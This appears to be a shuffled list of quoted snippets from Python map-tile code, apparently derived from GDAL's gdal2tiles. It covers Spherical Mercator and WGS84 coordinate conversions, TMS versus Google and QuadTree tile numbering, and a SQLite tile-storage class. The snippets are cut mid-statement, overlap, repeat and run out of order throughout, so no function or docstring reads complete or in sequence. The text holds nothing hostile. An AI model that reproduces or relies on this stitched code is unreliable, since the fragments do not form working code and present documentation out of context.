lat/lon coordinates on sphere are treated as if the", "is forced due # to weird effect in AutoCreateWarpedVRT) # 2 bands: 1", "): \"Resolution (meters/pixel) for given zoom level (measured at Equator)\" # return (2", "tile from a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y,", "What coordinate conversions do we need for TMS Global Mercator tiles:: LatLon <->", "z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # 
=============================================================================", "- GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft", "180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger", "every lower zoom level resolution is always divided by two initialResolution = 20037508.342789244", "return mx, my def MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical", "/ 2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates", "tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for", "- z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False):", "self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat,", "y int, z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\"", "the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244", "storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new", "============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined in Tile Map", "by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is", "math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self,", "closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if", "19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple", "z < self.minzoom: self.minzoom = z if self.maxzoom is None or z >", "is in the middle of extent. 
In fact you can calculate the constant", "self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y, z) : \"\"\" read", "self.initialResolution = 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize", "x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False):", "ORIGINAL, come with no warranty # <NAME> # input: vrt file (-addalpha) in", "--------- -- TMS / \\ <-> | | <-> /----/ <-> Google \\", "are treated as if the were on the WGS84 ellipsoid. From MSDN documentation:", "/ res mapSize = self.tileSize << zoom return px, mapSize - py def", "ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return", "raster itself is the same (equal extent, projection, pixel size), there is just", "the origin of pixel coordinates to top-left corner\" # # mapSize = self.tileSize", "self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\" write a single tile", "(pixels/meter) for pyramid with EPSG:900913? whole region is on top of pyramid (zoom=0)", "pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution is", "def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty,", "my = math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi", "= int( math.ceil( py / float(self.tileSize) ) - 1 ) return tx, ty", "in the bottom-left corner, id is XYZ. Google placed the origin [0,0] to", "of global tiles used on the web. 
It contains classes implementing coordinate conversions", "\"\"\" CREATE TABLE IF NOT EXISTS tiles ( x int, y int, z", "file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename):", "# We don't want to scale up def GoogleTile(self, tx, ty, zoom): \"Converts", "3857 projection (projection is forced due # to weird effect in AutoCreateWarpedVRT) #", "\"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering", "filename, basedir, overwrite=False) : \"\"\" Create a new sqlite file from a z/y/x.ext", "mx = lon * self.originShift / 180.0 my = math.log( math.tan((90 + lat)", "im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS", "maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon", "region in given pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize) )", "projection is degined as EPSG:3785. WKT definition is in the official EPSG database.", ": print (\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\"", "as: 2 * math.pi * 6378137 / 2.0 $ echo 180 85 |", "#****************************************************************************** # From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED", "BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from", "target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res", "int, y int, z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute(", "f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x, y,image) \\ #", "by <NAME> on 2008-07-03. 
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.", "projection. The spherical projection causes approximately 0.33 percent scale distortion in the Y", "existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False", "+= 1 if (ty & mask) != 0: digit += 2 quadKey +=", "<NAME> # input: vrt file (-addalpha) in 3857 projection (projection is forced due", "class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for generation of", "p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ =", "form of projection, not the ellipsoidal form. Since the projection is used only", "!= 0: digit += 1 if (ty & mask) != 0: digit +=", "math.exp( lat * math.pi / 180.0)) - math.pi / 2.0) return lat, lon", "is always divided by two initialResolution = 20037508.342789244 * 2 / 256 =", "sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom: self.minzoom = z if", "if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur", "if res: image = str(res[0]) return image else : print (\"None found\") return", "zoom): \"Converts pixel coordinates in given zoom level of pyramid to EPSG:900913\" mapSize", "using WGS84 datum, yeh? 
Yes, all lat/lon we are mentioning should use WGS84", "self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of the given", "cur.fetchone() if res: image = str(res[0]) return image else : print (\"None found\")", "numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select", "+lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913:", "\"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 *", "px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of the given tile", "xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname,", "os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class", "in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys)", "zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <->", "2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles =", "* self.originShift / 180.0 my = math.log( math.tan((90 + lat) * math.pi /", "= 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256", "zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz,", ") mx = px * res - self.originShift my = py * res", "direction, which is not visually noticable. How do I create a raster in", "pyramid with EPSG:900913? 
whole region is on top of pyramid (zoom=0) covered by", "pyr, zoom): \"Converts pixel coordinates in given zoom level of pyramid to EPSG:900913\"", "1 << (i-1) if (tx & mask) != 0: digit += 1 if", "targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a", "self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False def close(self):", "res = cur.fetchall() for (x, y, z) in res: xx= x zz= 17", "): \"Returns bounds of the given tile in latutude/longitude using WGS84 datum\" bounds", "OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor()", "is available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class", "pixel coordinates in given zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize", "): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty =", "- py def MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator coordinates\"", "zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _,", "maps of those web mapping applications. Pixel and tile coordinates are in TMS", "py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx,", "Summer of Code 2008, project GDAL2Tiles for OSGEO. 
In case you use this", "p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom", "of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize -", "only for map display, and not for displaying numeric coordinates, we don't need", "0: digit += 1 if (ty & mask) != 0: digit += 2", "from a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z,", "cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res = cur.fetchall() for", "to weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask", "y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y,", "overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename)", "- z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False):", "one alpha mask import sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py", "def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme", "so in fact lat/lon coordinates on sphere are treated as if the were", "maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy", "= 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference between", "difference between TMS and Google Maps/QuadTree tile name convention? The tile raster itself", "by Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as", "datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat,", "lat = (my / self.originShift) * 180.0 lat = 180 / math.pi *", "thousand kilometers, the coordinate origin is in the middle of extent. In fact", "name convention? 
The tile raster itself is the same (equal extent, projection, pixel", "What is the difference between TMS and Google Maps/QuadTree tile name convention? The", "2 / 256 = 156543.03392804062 What is the difference between TMS and Google", "\"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where x=? and y=? and", "for i in range(zoom, 0, -1): digit = 0 mask = 1 <<", "with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur =", "comes from the circumference of the Earth in meters, which is 40 thousand", "\"Returns bounds of the given tile in latutude/longitude using WGS84 datum\" bounds =", "z, image) : \"\"\" write a single tile from string \"\"\" if (x,", "= None self.maxzoom = None self.written = set() self.db.commit() self.pending_images = [] def", "# return px, mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns tile", "EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo", "your product, translate it to another language or find it usefull for your", "gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:900913'. For other", "extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom", "to another language or find it usefull for your project please let me", "createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering scheme from", "Spherical Mercator EPSG:900913\" mx = lon * self.originShift / 180.0 my = math.log(", "for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in", "targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from a", "y, z)) res = cur.fetchone() if res: image = str(res[0]) return image else", "should use WGS84 Geodetic Datum. 
Well, the web clients like Google Maps are", "range(zoom, 0, -1): digit = 0 mask = 1 << (i-1) if (tx", "public WebMapService Web Clients TileMapService What is the coordinate extent of Earth in", "<-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid", "used on the web. It contains classes implementing coordinate conversions for: - GlobalMercator", "zoom level resolution is always divided by two initialResolution = 20037508.342789244 * 2", "the constant as: 2 * math.pi * 6378137 / 2.0 $ echo 180", "y, z, f) : \"\"\" write a single tile from a file \"\"\"", "and convert coordinates with PROJ.4? You can use standard GIS tools like gdalwarp,", "y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite", "y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py", "<< zoom # return px, mapSize - py def MetersToTile(self, mx, my, zoom):", "x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # =============================================================================", "res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # =============================================================================", "ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates to Microsoft", "a raster in EPSG:900913 and convert coordinates with PROJ.4? 
You can use standard", "x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x,", "cur = self.db.cursor() cur.execute(\"select image from tiles where x=? and y=? and z=?\",", "mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates", "effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask import sqlite3", "overlay them on top of base maps of those web mapping applications. Pixel", "= self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy )", "tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom = None self.written =", "zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty", "XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon =", "my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds", "which is not visually noticable. How do I create a raster in EPSG:900913", "pyramid pixel coordinates in given zoom level\" res = self.Resolution( zoom ) px", "zoom ): \"Returns bounds of the given tile in latutude/longitude using WGS84 datum\"", "Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay", "we are mentioning should use WGS84 Geodetic Datum. Well, the web clients like", "Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles used", "if the were on the WGS84 ellipsoid. From MSDN documentation: To simplify the", "XYZ. Microsoft is referencing tiles by a QuadTree name, defined on the website:", "Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... 
and you can", "of the Earth in meters, which is 40 thousand kilometers, the coordinate origin", "the extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty,", "two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the", "extra precision of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent", "of base maps of those web mapping applications. Pixel and tile coordinates are", "py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of the given tile in", "= \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files", "was used. Class is available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL", "identification of the same raster tile. Tiles in TMS are counted from [0,0]", "The lat/lon coordinates are using WGS84 datum, yeh? Yes, all lat/lon we are", "y, z, f.read()) def writeImage(self, x, y, z, image) : \"\"\" write a", "tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03.", "to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0:", "can overlay them on top of base maps of those web mapping applications.", "/ | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients", "= set() self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\" Open an", "self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy ) def", "Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and", "(www.gdal.org). 
\"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile ---------------------------", "= self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat,", "mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level\"", "know. My email: klokan at klokan dot cz. I would like to know", "Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137", "/ 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar", "file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False def", "tileSize 256 pixels self.originShift = 2 * math.pi * 6378137 / 2.0 #", "necessary for generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps", "the same (equal extent, projection, pixel size), there is just different identification of", "from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y,", "(measured at Equator)\" # return (2 * math.pi * 6378137) / (self.tileSize *", "z) in res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im)", "(projection is forced due # to weird effect in AutoCreateWarpedVRT) # 2 bands:", "tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return", "in given zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom", "WKT definition is in the official EPSG database. 
Proj4 Text: +proj=merc +a=6378137 +b=6378137", "( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns", "s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT", "int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert", ", _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1,", "| gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878", "values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y, z) :", "print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z,", "Since the projection is used only for map display, and not for displaying", "self.tileSize << zoom py = mapSize - pyr res = self.Resolution( zoom )", "scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x,", "open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global", "bounds of the given tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds(", "check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same", "/ 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in", ".----. --------- -- TMS / \\ <-> | | <-> /----/ <-> Google", "same raster tile. 
Tiles in TMS are counted from [0,0] in the bottom-left", "in meters, which is 40 thousand kilometers, the coordinate origin is in the", "tiles\") res = cur.fetchall() for (x, y, z) in res: xx= x zz=", "EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based", "my * self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my ):", "areas with abs(latitude) bigger then 85.05112878 are clipped off. What are zoom level", "def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given", "self.minzoom is None or z < self.minzoom: self.minzoom = z if self.maxzoom is", "with EPSG:900913? whole region is on top of pyramid (zoom=0) covered by 256x256", "is just different identification of the same raster tile. Tiles in TMS are", "6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon", "# 156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi * 6378137", "no warranty # <NAME> # input: vrt file (-addalpha) in 3857 projection (projection", "to the top-left corner, reference is XYZ. Microsoft is referencing tiles by a", "referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon", "top of base maps of those web mapping applications. 
Pixel and tile coordinates", "i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1 else: return", "structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs)", "with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur =", "self.db.commit() def readImage(self, x, y, z) : \"\"\" read a single tile as", "yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert", "(mx + self.originShift) / res py = (my + self.originShift) / res mapSize", "if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc,", "or z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force = False):", "range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1 else: return 0 #", "2 * math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform", "It contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913 =", "mask = 1 << (i-1) if (tx & mask) != 0: digit +=", "zoom): \"Converts TMS tile coordinates to Google Tile coordinates\" # coordinate origin is", "lat/lon coordinates on sphere are treated as if the were on the WGS84", "for your project please let me know. 
My email: klokan at klokan dot", "* 180.0 lat = (my / self.originShift) * 180.0 lat = 180 /", "conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo", "to XY in Spherical Mercator EPSG:900913\" mx = lon * self.originShift / 180.0", "False): if len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert into tiles", "zoom level\" res = self.Resolution( zoom ) px = (mx + self.originShift) /", "create(self, filename, overwrite=False): \"\"\" Create a new storage file, overwrite or not if", "level\" res = self.Resolution( zoom ) px = (mx + self.originShift) / res", "same (equal extent, projection, pixel size), there is just different identification of the", "tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where x=?", "size), there is just different identification of the same raster tile. Tiles in", "writeImageFile(self, x, y, z, f) : \"\"\" write a single tile from a", "we use the spherical form of projection, not the ellipsoidal form. Since the", "----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate", "\"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize", "ty = int( math.ceil( py / float(self.tileSize) ) - 1 ) return tx,", "tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, ))", "= self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles ( x int,", "those web mapping applications. 
Pixel and tile coordinates are in TMS notation (origin", "come with no warranty # <NAME> # input: vrt file (-addalpha) in 3857", "-- TMS / \\ <-> | | <-> /----/ <-> Google \\ /", "mx, my ): \"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in", "\"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True", "Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom - 1) - ty for", "for tileSize 256 pixels self.originShift = 2 * math.pi * 6378137 / 2.0", "LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in", "# 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84 Datum", ") - 1 ) ty = int( math.ceil( py / float(self.tileSize) ) -", "standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports", "+ self.originShift) / res py = (my + self.originShift) / res mapSize =", "# ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined in Tile", "cur.execute(\"select x, y, z from tiles\") res = cur.fetchall() for (x, y, z)", "self.pending_images = [] self.db.commit() def readImage(self, x, y, z) : \"\"\" read a", "self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x, y,image) \\ # values", "Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base", "base maps of those web mapping applications. 
Pixel and tile coordinates are in", "/--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is", "res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self,", "are projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates on", "to scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to", "are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we", "= 2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat,", "Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates", "-20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in", "new sqlite with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite)", "projection (projection is forced due # to weird effect in AutoCreateWarpedVRT) # 2", "# ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles", "= self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom))", "lat * math.pi / 180.0)) - math.pi / 2.0) return lat, lon def", "Datum. 
Well, the web clients like Google Maps are projecting those coordinates by", "= cur.fetchall() for (x, y, z) in res: xx= x zz= z yy=", "lat/lon in WGS84 Datum\" lon = (mx / self.originShift) * 180.0 lat =", "(?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f)", "/ res py = (my + self.originShift) / res mapSize = self.tileSize <<", "CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename)", "# mapSize = self.tileSize << zoom # return px, mapSize - py def", "Survey OpenSpace API, ... and you can overlay them on top of base", "self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon", "string \"\"\" if (x, y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z,", "x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with", "xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy", "zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _", "lat) * math.pi / 360.0 )) / (math.pi / 180.0) my = my", "generation of global tiles used on the web. 
